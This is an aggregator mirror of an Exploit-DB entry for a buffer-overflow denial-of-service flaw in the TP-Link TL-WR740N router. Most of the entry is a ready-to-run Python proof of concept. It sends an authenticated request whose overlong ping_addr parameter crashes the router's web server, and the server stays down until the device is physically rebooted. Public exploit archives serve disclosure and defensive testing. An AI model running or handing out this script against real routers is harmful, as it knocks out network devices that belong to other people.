8
[webapps] TP-Link TL-WR740N - Buffer Overflow 'DOS'
source link: https://www.exploit-db.com/exploits/51866
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
TP-Link TL-WR740N - Buffer Overflow 'DOS'
# Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS'
# Date: 8/12/2023
# Exploit Author: Anish Feroz (ZEROXINN)
# Vendor Homepage: http://www.tp-link.com
# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
# Tested on: TP-Link TL-WR740N
#Description:
#There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router.
#Usage:
#python3 target username password
#change port, if required
------------------------------------------------POC-----------------------------------------
#!/usr/bin/python
import requests
from requests.auth import HTTPBasicAuth
import base64
def send_request(ip, username, password):
auth_url = f"http://{ip}:8082"
target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20"
credentials = f"{username}:{password}"
encoded_credentials = base64.b64encode(credentials.encode()).decode()
headers = {
"Host": f"{ip}:8082",
"Authorization": f"Basic {encoded_credentials}",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
session = requests.Session()
response = session.get(target_url, headers=headers)
if response.status_code == 200:
print("Server Crashed")
print(response.text)
else:
print(f"Script Completed with status code {response.status_code}")
ip_address = input("Enter IP address of the host: ")
username = input("Enter username: ")
password = input("Enter password: ")
send_request(ip_address, username, password)
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK